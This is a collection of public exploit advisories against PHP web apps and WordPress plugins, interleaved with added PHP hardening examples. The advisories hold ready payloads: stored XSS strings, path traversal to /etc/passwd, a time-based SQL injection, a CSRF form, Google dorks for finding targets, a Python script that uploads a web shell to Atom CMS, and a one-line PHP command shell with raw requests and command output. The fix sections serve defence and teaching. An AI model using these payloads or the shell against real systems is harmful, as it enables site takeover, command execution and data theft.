<pre><code>## Title: Medical Hub Directory Site 1.0 XSS Stored<br /># Author: Hejap Zairy<br /># Date: 30.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15252/simple-medical-hub-directory-site-phpoop-source-code.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/mhds.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br />## Description:<br />Stored XSS, also known as persistent XSS, is the more damaging of the two main XSS variants: the malicious script is saved by the vulnerable application (here in the "System Short Name" setting) and is served to every user who later loads a page that renders it. Reflected XSS, by contrast, only bounces a script carried in a single request back into that requester's browser.<br /><br />Status: CRITICAL<br />[+] Payloads:<br />```<br />https://0day.gov/mhds/admin/?page=system<br />> System Short Name<br /><img src=1 href=1 onerror="javascript:alert('HEJAP ZAIRY AL-SHARIF')"></img><br />```<br /><br />## Proof and Exploit:<br />https://i.imgur.com/UU6i7SN.png<br />https://i.imgur.com/qF6DabE.png<br /></code></pre>
<pre><code># Title: Medical Hub Directory Site LFI To RCE<br /># Author: Hejap Zairy<br /># Date: 30.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15252/simple-medical-hub-directory-site-phpoop-source-code.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/mhds.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /># Vulnerable code (PHP)<br />The page parameter is taken straight from the query string and reaches require_once without filtering, so directory traversal sequences are honoured:<br /><br />```<br /><?php<br />require_once('config.php');<br />$page = isset($_GET['page']) ? $_GET['page'] : 'home';<br />$page_name = explode("/",$page)[count(explode("/",$page)) -1];<br />?><br />```<br /><br />[+] Payload GET<br /><br />The 515 parameter carries the OS command to run; URL-decoded it reads `type C:\0day_Hejap_.txt && dir C:\`.<br /><br />```<br />GET /mhds/index.php?page=../../../0day&515=%74%79%70%65%20%43%3a%5c%30%64%61%79%5f%48%65%6a%61%70%5f%2e%74%78%74%20%26%26%20%64%69%72%20%43%3a%5c HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Content-Length: 354<br />Cookie: PHPSESSID=c9sbs70le23qois1riekoj8osg<br />Upgrade-Insecure-Requests: 1<br />```<br /><br /><br /># Status: CRITICAL<br /><br /># Response<br />```<br />Hegap Zairy 0day Volume in drive C is OS<br />Volume Serial Number is 2EF1-9DCA<br /><br /> Directory of C:\<br /><br />03/18/2022 10:27 AM <DIR> Program Files<br />03/21/2022 01:45 PM <DIR> Program Files (x86)<br />03/02/2022 11:04 PM <DIR> Python27<br />03/26/2022 08:33 PM <DIR> Temp<br />03/26/2022 08:45 PM <DIR> Users<br />```<br /><br /><br /># Description:<br />Local File Inclusion is an attack technique in which attackers trick a web application into including a file that is already present on the web server, either disclosing its contents or executing it as code. When the included file contains PHP the attacker controls, as with the file included above, which executes the command passed in the 515 parameter, the inclusion turns into remote command execution.<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/pKIxv1l.png<br /></code></pre>
<pre><code># Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Blind SQL Injection (Authenticated)<br /># Date: 2021-04-14<br /># Exploit Author: Rahad Chowdhury<br /># Vendor Homepage: https://www.cszcms.com/<br /># Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.2.9.zip<br /># Version: 1.2.9<br /># Tested on: Windows 10, Kali Linux, PHP 7.4.16, Apache 2.4.46<br /># CVE: CVE-2021-43701<br /><br />*Steps to Reproduce:*<br />1. Log in to the Admin Panel.<br />2. Go to "General Menu > CSV Export / Import".<br />3. Start Burp Suite and configure the browser to use it as a proxy.<br />4. Select any "Table Name", then a "Fields Select" entry and a "Sort by" column.<br />5. Click "Export to CSV" and intercept the request in Burp Suite.<br />6. The "fieldS[]" and "orderby" parameters are vulnerable. A time-based blind injection can be confirmed by placing the query "(select(0)from(select(sleep(10)))a)" in the "orderby" parameter.<br /><br />*Proof of Concept:*<br />http://127.0.0.1/CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV<br /><br />*Output:*<br />With sleep(0) the response is delayed by 0 seconds.<br />With sleep(1) the response is delayed by 1 second.<br />With sleep(5) the response is delayed by 5 seconds.<br />With sleep(10) the response is delayed by 10 seconds.<br />The delay scales with the argument to sleep(), which confirms that the injected expression is evaluated by the database.<br /></code></pre>
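Both injectable parameters above (`fieldS[]` and `orderby`) end up in the generated SQL as identifiers, and identifiers cannot be bound as prepared-statement parameters, which is why string concatenation is so common at exactly this spot. The fix is to accept only identifiers from a closed list and to bind everything that is a value. The following is an added example, not CSZ CMS code; the table and column names, the `:since` filter and the `get_pdo()` helper are assumptions for illustration.

```php
<?php
// Added example, not CSZ CMS code. Table/column names, the :since filter and
// get_pdo() are hypothetical; the pattern (whitelist identifiers, bind values)
// is the point.
declare(strict_types=1);

// Identifiers cannot be bound with PDO placeholders, so each one the client
// may choose is checked against a closed list before it is quoted into SQL.
const EXPORTABLE = [
    'article_db' => ['article_db_id', 'article_title', 'article_date'],
];

function build_export_sql(string $table, array $fields, string $orderby, string $sort): string
{
    if (!array_key_exists($table, EXPORTABLE)) {
        throw new InvalidArgumentException('table not exportable');
    }
    $allowed = EXPORTABLE[$table];
    if ($fields === []) {
        throw new InvalidArgumentException('no fields selected');
    }
    // Strict in_array(): "0" or true must not match a column name loosely.
    foreach ($fields as $field) {
        if (!is_string($field) || !in_array($field, $allowed, true)) {
            throw new InvalidArgumentException('unknown field');
        }
    }
    if (!in_array($orderby, $allowed, true)) {
        throw new InvalidArgumentException('unknown orderby column');
    }
    // Sort direction is a two-value enum, never free text.
    $sort = strtoupper($sort) === 'DESC' ? 'DESC' : 'ASC';

    // Backtick-quote the (already whitelisted) identifiers for MySQL.
    $quote = static fn(string $id): string => '`' . str_replace('`', '``', $id) . '`';
    return sprintf(
        'SELECT %s FROM %s WHERE `article_date` >= :since ORDER BY %s %s',
        implode(', ', array_map($quote, $fields)),
        $quote($table),
        $quote($orderby),
        $sort
    );
}

try {
    // The PoC value "(select(0)from(select(sleep(10)))a)" fails the orderby
    // whitelist and never reaches MySQL.
    $sql = build_export_sql(
        'article_db',
        (array) ($_GET['fieldS'] ?? []),
        (string) ($_GET['orderby'] ?? ''),
        (string) ($_GET['sort'] ?? 'ASC')
    );
    // The one client-controlled *value* is bound as a parameter.
    $stmt = get_pdo()->prepare($sql);   // get_pdo(): assumed helper returning a PDO
    $stmt->execute([':since' => (string) ($_GET['since'] ?? '1970-01-01')]);
    $rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    exit('invalid export parameters');
}
```

The whitelist is what stops the time-based probe; the prepared statement protects the filter value only. Checking the whitelist with a strict comparison matters because PHP's loose `in_array()` would let values such as `0` or `true` match a column name.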
<pre><code># Exploit Title: WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion - Unauthenticated<br /># Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/<br /># Date: 29-03-2022<br /># Exploit Author: Hassan Khan Yusufzai - Splint3r7<br /># Vendor Homepage: https://wordpress.org/plugins/video-synchro-pdf/<br /># Version: 1.7.4<br /># Contact me: h [at] spidersilk.com<br /><br /># Vulnerable File: video-synchro-pdf/reglages/Menu_Plugins/tout.php<br /><br /># Vulnerable Code:<br /><br />```<br /><?php<br />if ($_GET['p']<=NULL) {<br />    include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/index.php');<br />}else{<br />    include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/'.$_GET['p'].'.php');<br />}<br />```<br />The p parameter is concatenated into the include path with only a .php suffix appended, so directory traversal sequences are honoured.<br /><br /># Proof of Concept:<br /><br />http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../../../../../etc/index [LFI]<br />http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion - Unauthenticated<br /># Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/<br /># Date: 29-03-2022<br /># Exploit Author: Hassan Khan Yusufzai - Splint3r7<br /># Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/<br /># Version: 1.0.3<br /># Tested on: Firefox<br /># Contact me: h [at] spidersilk.com<br /><br /># Vulnerable File: tblight.php<br /><br /># Vulnerable Code:<br /><br />```<br />if(!empty($_GET['controller']) && !empty($_GET['action']) &&<br />   !empty($_GET['ajax']) && $_GET['ajax'] == 1)<br />{<br />    require_once('' . 'controllers/'.$_GET['controller'].'.php');<br />}<br />```<br />The controller parameter is used as a path component of the require_once target; action and ajax only gate the branch and are not validated further.<br /><br /># Proof of concept:<br /><br />http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1<br />http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1<br /><br /># POC image:<br /><br />https://prnt.sc/9O8_akDp2HPC<br /></code></pre>
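The three inclusion bugs on this page (Medical Hub's `page`, video-synchro-pdf's `p` and cab-fare-calculator's `controller`) share one pattern: a request parameter is concatenated into an include path. The hardened version below is an added example, not code from any of these projects; the `PAGES` map, the `pages/` directory and the page names in it are assumptions. It maps the request value to a file through a fixed table, then verifies with `realpath()` that the chosen file still lies inside the expected directory. One caveat on the PoCs above: the `%00` suffix truncates the appended `.php` only on PHP older than 5.3.4, so on current PHP the traversal itself still works but only files whose names end in `.php` can be included.

```php
<?php
// Added example, not code from any of the plugins above. The page map and
// directory names are hypothetical; the pattern is what matters.
declare(strict_types=1);

// Step 1 (preferred): map the user-facing name to a file ourselves, so the
// request never supplies any part of a filesystem path.
const PAGES = [
    'home'   => 'home.php',
    'system' => 'system.php',
    'index'  => 'index.php',
];

function resolve_page(string $requested, string $baseDir): string
{
    if (!array_key_exists($requested, PAGES)) {
        throw new RuntimeException('unknown page');
    }
    $target = $baseDir . DIRECTORY_SEPARATOR . PAGES[$requested];

    // Step 2 (defence in depth): even a mapped file must resolve inside the
    // directory we expect. realpath() collapses "..", symlinks and the like;
    // a false return means the file does not exist.
    $realBase = realpath($baseDir);
    $realTarget = realpath($target);
    if ($realBase === false || $realTarget === false) {
        throw new RuntimeException('page file missing');
    }
    $prefix = $realBase . DIRECTORY_SEPARATOR;
    if (strncmp($realTarget, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('page resolved outside base directory');
    }
    return $realTarget;
}

// Null bytes can no longer truncate include() paths on supported PHP, but a
// request carrying one is never legitimate, so reject it outright as well.
function page_param(array $query, string $name, string $default): string
{
    $value = $query[$name] ?? $default;
    if (!is_string($value) || strpos($value, "\0") !== false) {
        throw new RuntimeException('malformed page parameter');
    }
    return $value;
}

try {
    $page = page_param($_GET, 'page', 'home');
    // "../../../0day" and "../../../../etc/passwd%00" both fail at the
    // whitelist lookup; nothing from the request ever reaches require_once.
    require_once resolve_page($page, __DIR__ . '/pages');
} catch (RuntimeException $e) {
    http_response_code(404);
    exit('page not found');
}
```

The whitelist alone closes the hole; the `realpath()` prefix check is there so that a later edit to the map (say, a value containing `../`) cannot silently reopen it.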
<pre><code># Exploit Title: Atom CMS 2.0 - Remote Code Execution (RCE)<br /># Date: 22.03.2022<br /># Exploit Author: Ashish Koli (Shikari)<br /># Vendor Homepage: https://thedigitalcraft.com/<br /># Software Link: https://github.com/thedigicraft/Atom.CMS<br /># Version: 2.0<br /># Tested on: Ubuntu 20.04.3 LTS<br /># CVE: CVE-2022-25487<br /><br /># Description<br />This script uploads a PHP web shell to Atom CMS through /admin/uploads.php. The application stores the file in the uploads directory under a unique number, which the script extracts from the response to build the URL of the web shell.<br /><br /># Usage : python3 exploit.py <IP> <Port> <atomcmspath><br /># Example: python3 exploit.py 127.0.0.1 80 /atom<br /><br /># POC Exploit: https://youtu.be/qQrq-eEpswc<br /># Note: A crafted "shell.txt" file (the raw multipart body carrying the web shell, using the boundary set in the Content-Type header below) is required for exploitation and is available at:<br /># https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC<br /><br />#!/usr/bin/python3<br />'''<br />Description:<br />A file upload functionality in Atom CMS 2.0 allows any<br />non-privileged user to gain access to the host through the uploaded files,<br />which may result in remote code execution.<br />'''<br /><br />import re<br />import sys<br /><br />import requests<br /><br /># Optional: pass proxies=proxies to the requests calls below to inspect the<br /># traffic in Burp Suite.<br />proxies = {<br />    'http': 'http://localhost:8080',<br />    'https': 'http://localhost:8080',<br />}<br /><br />'''<br />User input:<br />'''<br />if len(sys.argv) != 4:<br />    print('Usage: python3 exploit.py <IP> <Port> <atomcmspath>')<br />    sys.exit(1)<br />target_ip = sys.argv[1]<br />target_port = sys.argv[2]<br />atomcmspath = sys.argv[3]<br />base_url = 'http://' + target_ip + ':' + target_port + atomcmspath<br /><br />'''<br />Get a session cookie:<br />'''<br />session = requests.Session()<br />session.get(base_url + '/admin')<br /># Serialise the cookie jar as a Cookie header ("name=value; name2=value2").<br />cookie = '; '.join(name + '=' + value for name, value in session.cookies.get_dict().items())<br /><br />'''<br />Upload the web shell:<br />'''<br /># Construct the headers. The multipart boundary must match the one used<br /># inside shell.txt, because that file is sent as the raw request body.<br />header1 = {<br />    'Host': target_ip,<br />    'Accept': 'application/json',<br />    'Cache-Control': 'no-cache',<br />    'X-Requested-With': 'XMLHttpRequest',<br />    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36',<br />    'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L',<br />    'Origin': 'http://' + target_ip,<br />    'Referer': base_url + '/admin/index.php?page=users&id=1',<br />    'Accept-Encoding': 'gzip, deflate',<br />    'Accept-Language': 'en-US,en;q=0.9',<br />    'Cookie': cookie,<br />    'Connection': 'close',<br />}<br /><br /># Load the web shell payload (raw multipart body).<br />with open('shell.txt', 'rb') as fp:<br />    data = fp.read()<br /><br /># Upload it.<br />link_upload = base_url + '/admin/uploads.php?id=1'<br />upload = requests.post(link_upload, headers=header1, data=data)<br /><br /># The response carries the numeric id the file was stored under. Normalise<br /># whitespace, drop the "1<br>Unknown" fragment of a PHP notice that can<br /># precede it, and keep only the digits.<br />body = re.sub(r'\s', '\n', upload.text)<br />body = body.replace('1<br>Unknown', 'null')<br />file_id = re.sub(r'[^0-9]', '', body)<br /><br />'''<br />Finish:<br />'''<br />print('Uploaded Webshell to: ' + base_url + '/uploads/' + file_id + '.php')<br />print('')<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin donorbox-donation-form 7.1.6 - Stored Cross Site Scripting (Authenticated)<br /># Date: 29-03-2022<br /># Exploit Author: Hassan Khan Yusufzai - Splint3r7<br /># Vendor Homepage: https://wordpress.org/plugins/donorbox-donation-form<br /># Version: 7.1.6<br /># Tested on: Firefox<br /># Contact me: h [at] spidersilk.com<br /><br /><br /># Vulnerable Code:<br /><br />```<br />public function donorbox_embed_campaign_id_settings() { ?><br />    <input name="donorbox_embed_campaign_options[donorbox_embed_campaign_id]"<br />           type="text"<br />           value="<?php echo $this->options['donorbox_embed_campaign_id']; ?>"<br />           class="regular-text" /><br />    <?php<br />}<br />```<br />The stored option value is echoed into the value attribute without esc_attr() or any other escaping.<br /><br /># POC<br /><br />1) Install the donorbox-donation-form WordPress plugin<br />2) Open the donorbox plugin settings<br />3) Inject the payload in the URL field<br />4) The XSS will trigger.<br /><br /># Timeline<br /><br />21/03/2022 - Vendor notified<br />24/03/2022 - Fix / patch<br />24/03/2022 - CVE Requested<br />29/03/2022 - Public disclosure<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin clipr 1.2.3 - Stored Cross Site Scripting (Authenticated)<br /># Date: 29-03-2022<br /># Exploit Author: Hassan Khan Yusufzai - Splint3r7<br /># Vendor Homepage: https://wordpress.org/plugins/clipr/<br /># Version: 1.2.3<br /># Tested on: Firefox<br /># Contact me: h [at] spidersilk.com<br /><br /># POC<br /><br />- Install the plugin: https://wordpress.org/plugins/clipr/<br />- Navigate to the settings page of the plugin:<br />http://localhost:10003/wp-admin/options-general.php?page=clipr<br />- Inject the payload `asdasd'></script><script>alert(1)</script>`<br />- Navigate to the main page of the WordPress site: `http://localhost:10003/`<br />- The malicious JavaScript payload will execute: the `'></script>` prefix breaks out of the context the setting is rendered into, and the trailing `<script>` block then runs on every front-end page load.<br /></code></pre>
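The three stored XSS issues on this page differ only in where the saved value is rendered: Medical Hub's "System Short Name" lands in HTML body text, donorbox echoes its option into a `value="..."` attribute, and the clipr payload breaks out of the context the setting is written into with `'></script>`. The following is an added example, not code from any of these projects, showing the escaping each context needs; the variable names and the two sample values are constructed. Inside WordPress the same three jobs are done by esc_html(), esc_attr() and wp_json_encode(); plain PHP functions are used here so the snippet runs without WordPress.

```php
<?php
// Added example, not code from Medical Hub Directory, donorbox or clipr.
// Each helper matches the context the value lands in; using the wrong one
// (or none, as in the vulnerable snippets above) is what lets a stored
// payload execute.

// Constructed samples of what an attacker could have saved in a setting.
$storedScriptBreakout = "asdasd'></script><script>alert(1)</script>";
$storedImgHandler     = '<img src=1 onerror="alert(1)">';

// 1. HTML body text (e.g. a "System Short Name" rendered in a heading).
function esc_html_text(string $v): string
{
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// 2. Attribute value. Same escaping, and the attribute MUST be quoted in the
//    template; an unquoted attribute lets a single space start a new one.
function esc_attribute(string $v): string
{
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// 3. Value embedded in an inline <script>. Emit it as a JSON string literal
//    with the HEX flags so "<", ">", "&" and quotes become \uXXXX escapes and
//    a literal "</script>" inside the value cannot terminate the block.
function esc_js_literal(string $v): string
{
    return json_encode(
        $v,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}
?>
<!-- Body text context: the <img> tag is rendered as literal text. -->
<h1><?= esc_html_text($storedImgHandler) ?></h1>

<!-- Attribute context: the quote in the payload cannot close the attribute. -->
<input name="donorbox_embed_campaign_options[donorbox_embed_campaign_id]"
       type="text" value="<?= esc_attribute($storedScriptBreakout) ?>" class="regular-text" />

<!-- Script context: the value arrives as a JS string, not as markup. -->
<script>
  var cliprSetting = <?= esc_js_literal($storedScriptBreakout) ?>;
</script>
```

The script case is the one most often missed: `htmlspecialchars()` is not enough there, because the browser's HTML parser finds the `</script>` terminator before the JavaScript engine ever sees the string, so the closing tag has to be neutralised at the byte level, which the `JSON_HEX_TAG` flag does.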
<pre><code># Exploit Title: WordPress Plugin curtain 1.0.2 - CSRF<br /># Date: 29-03-2022<br /># Exploit Author: Hassan Khan Yusufzai - Splint3r7<br /># Vendor Homepage: https://wordpress.org/plugins/curtain/<br /># Version: 1.0.2<br /># Tested on: Firefox<br /># Contact me: h [at] spidersilk.com<br /><br />## Summary:<br /><br />A cross-site request forgery (CSRF) vulnerability has been identified in the curtain WordPress plugin that allows an attacker to activate or deactivate the site's maintenance mode. The mode change is triggered by a GET request whose _wpnonce parameter is not validated: it can be left empty, so any page an authenticated administrator visits can submit the request on their behalf.<br /><br />## Vulnerable URL:<br /><br />http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=1<br /><br />## CSRF POC Exploit<br /><br />```<br /><html><br />  <body><br />    <form action="http://localhost:10003/wp-admin/options-general.php"><br />      <input type="hidden" name="page" value="curtain" /><br />      <input type="hidden" name="_wpnonce" value="" /><br />      <input type="hidden" name="mode" value="1" /><br />      <input type="submit" value="Submit request" /><br />    </form><br />  </body><br /></html><br />```<br /><br />- To deactivate maintenance mode, change the mode value to 0.<br /></code></pre>
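The fix for the curtain issue is to require a valid nonce and a capability check before the mode is changed. Below is an added example, not the curtain plugin's code; the option key `curtain_maintenance_mode` and the nonce action string `curtain_toggle_mode` are assumptions, while the WordPress functions used are real. The PoC form above, which sends an empty `_wpnonce`, is stopped by `check_admin_referer()` before `update_option()` runs.

```php
<?php
// Added example, not the curtain plugin's code. Option key and nonce action
// are hypothetical; add_query_arg(), admin_url(), wp_nonce_url(),
// current_user_can(), check_admin_referer(), update_option() and wp_die()
// are WordPress core functions.

const CURTAIN_OPTION = 'curtain_maintenance_mode';   // hypothetical option key
const CURTAIN_ACTION = 'curtain_toggle_mode';        // nonce action string

// Build the toggle link. wp_nonce_url() appends _wpnonce=..., a token bound
// to the current user, the action string and a time window.
function curtain_toggle_url(int $mode): string
{
    $url = add_query_arg(
        ['page' => 'curtain', 'mode' => $mode],
        admin_url('options-general.php')
    );
    return wp_nonce_url($url, CURTAIN_ACTION);
}

// Handle the request: authorization AND anti-CSRF checks before any state change.
function curtain_handle_mode_change(): void
{
    if (!isset($_GET['page'], $_GET['mode']) || $_GET['page'] !== 'curtain') {
        return;
    }
    // 1. Authorization: only users allowed to change site options.
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions', '', ['response' => 403]);
    }
    // 2. Anti-CSRF: the request must carry a valid nonce for this action.
    //    check_admin_referer() dies with a 403 when _wpnonce is missing,
    //    empty or forged, which is exactly what the PoC form sends.
    check_admin_referer(CURTAIN_ACTION);

    // 3. Only now accept the (normalised) state change.
    $mode = ($_GET['mode'] === '1') ? 1 : 0;
    update_option(CURTAIN_OPTION, $mode);
}
add_action('admin_init', 'curtain_handle_mode_change');
```

The nonce closes the CSRF hole on its own; the capability check is still needed because a nonce proves the request came from a page WordPress rendered for that user, not that the user is allowed to perform the action. Moving the toggle from GET to a POST form would additionally keep the state change out of browser history and referrer logs.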
<pre><code># Title: Message System 1.0 Shell Upload<br /># Author: Hejap Zairy<br /># Date: 29.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15249/message-system-phpoop-free-source-code.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pmms_1.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br />A registered user can bypass the upload filter and store a .png.php file through the attachments section by intercepting the request in Burp Suite and editing the raw multipart body: the file part declares Content-Type: image/png while its filename keeps a .php extension, and the server writes it under that client-supplied name.<br /><br /><br /># Vulnerable code (PHP)<br />The image upload needs stricter filtering:<br /><br />```<br />if(isset($_FILES['image']) && $_FILES['image']['tmp_name'] != ''){<br />    if(!is_dir(base_app."uploads/users"))<br />        mkdir(base_app."uploads/users");<br />    $fname = 'uploads/users/avatar-'.$uid.'.png';<br />    $dir_path = base_app. $fname;<br />    $upload = $_FILES['image']['tmp_name'];<br />    $type = mime_content_type($upload);<br />    $allowed = array('image/png','image/jpeg');<br />    if(!in_array($type,$allowed)){<br />        $resp['msg'].=" But Image failed to upload due to invalid file type.";<br />    }else{<br />        $new_height = 200;<br />        $new_width = 200;<br />```<br /><br /><br />[+] Payload POST<br /><br />```<br />POST /pmms/registration.php?id=1&firstname=Admin&middlename=admin&lastname=admin&gender=Male&dob=2022-03-30&username=Admin&password=Admin12345A%40%23&image=0day_Hejap.png HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: PHPSESSID=jj352kdlpp0ib5lu0v5ddm199m<br />Upgrade-Insecure-Requests: 1<br /><br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="image"; filename="0day_hejap.png.php"<br />Content-Type: image/png<br /><br /><?=`$_GET[515]`?><br /><br />-----------------------------409902128312379197203124536738<br />```<br /><br /><br /># Status: CRITICAL<br /><br />[+] Payload GET<br /><br />```<br />GET /pmms/uploads/users/0day_hejap.png.php?515=echo+Hejap+Zairy HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: PHPSESSID=pqbgvck1gedt9if6p582nt9a41<br />Upgrade-Insecure-Requests: 1<br />```<br /><br /># Response<br />```<br />HTTP/1.1 200 OK<br />Date: Tue, 29 Mar 2022 12:45:59 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-Powered-By: PHP/7.4.27<br />Access-Control-Allow-Origin: *<br />Content-Length: 12<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />Hejap Zairy<br />```<br /><br /><br /># Description:<br />An upload filter bypass lets a user store an executable script file on the server and then run server-side commands through it. Here the uploaded file is a one-line PHP shell, `<?=`$_GET[515]`?>`, which executes whatever shell command arrives in the 515 parameter, so the GET request above returns the output of `echo Hejap Zairy`. This class of attack is the most direct and effective and sometimes has almost no technical barrier.<br /><br /><br /># Proof and Exploit:<br /><br />https://i.imgur.com/7mZnH7L.png<br />https://i.imgur.com/rDdybxC.png<br /></code></pre>
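The upload above succeeds because a filename ending in `.php` is written to a web-served directory. The added example below, not Message System's code, shows the checks a hardened avatar upload performs in order: an extension whitelist taken from the last dot, MIME sniffing of the bytes on disk rather than the client's `Content-Type` part header, an image decode test, and a server-chosen filename so nothing from the request reaches the filesystem. The upload directory constant and the `$uid` argument are assumptions.

```php
<?php
// Added example, not Message System code. UPLOAD_DIR and the field layout are
// hypothetical; the sequence of checks is the point.
declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/uploads/users';   // must not be PHP-executable
const ALLOWED = [
    // extension => MIME type that finfo must report for the actual bytes
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
];

function store_avatar(array $file, int $uid): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'] ?? '')) {
        throw new RuntimeException('no valid upload');
    }

    // 1. Extension from the LAST dot, lower-cased, against a closed list.
    //    "0day_hejap.png.php" -> "php" -> rejected.
    $ext = strtolower(pathinfo((string) $file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('extension not allowed');
    }

    // 2. Content: sniff the bytes on disk. The multipart part header
    //    "Content-Type: image/png" is attacker-controlled and never consulted.
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mime = finfo_file($finfo, $file['tmp_name']);
    finfo_close($finfo);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }

    // 3. Must decode as an image at all; "<?=`$_GET[515]`?>" fails here.
    if (getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an image');
    }

    // 4. Server-chosen name: the client's filename is used for nothing
    //    beyond step 1, and a random suffix prevents overwrites/guessing.
    if (!is_dir(UPLOAD_DIR) && !mkdir(UPLOAD_DIR, 0755, true)) {
        throw new RuntimeException('cannot create upload directory');
    }
    $dest = UPLOAD_DIR . '/avatar-' . $uid . '-' . bin2hex(random_bytes(8)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $dest;
}

// Usage inside the registration handler ($uid assumed to be the new user's id).
try {
    $stored = store_avatar($_FILES['image'] ?? [], (int) $uid);
} catch (RuntimeException $e) {
    $resp['msg'] = ' But Image failed to upload: ' . $e->getMessage();
}
```

Two further layers belong outside this function. Serve the upload directory with PHP disabled (for mod_php, `php_flag engine off` in that directory's `.htaccess`, or a `<FilesMatch "\.php$">` block with `Require all denied`), so that even a file that slips through cannot execute. And because a polyglot that is simultaneously a valid PNG and valid PHP passes both `finfo_file()` and `getimagesize()`, re-encoding the image with GD (`imagecreatefromstring()` followed by `imagepng()`) before storing it strips any trailing code.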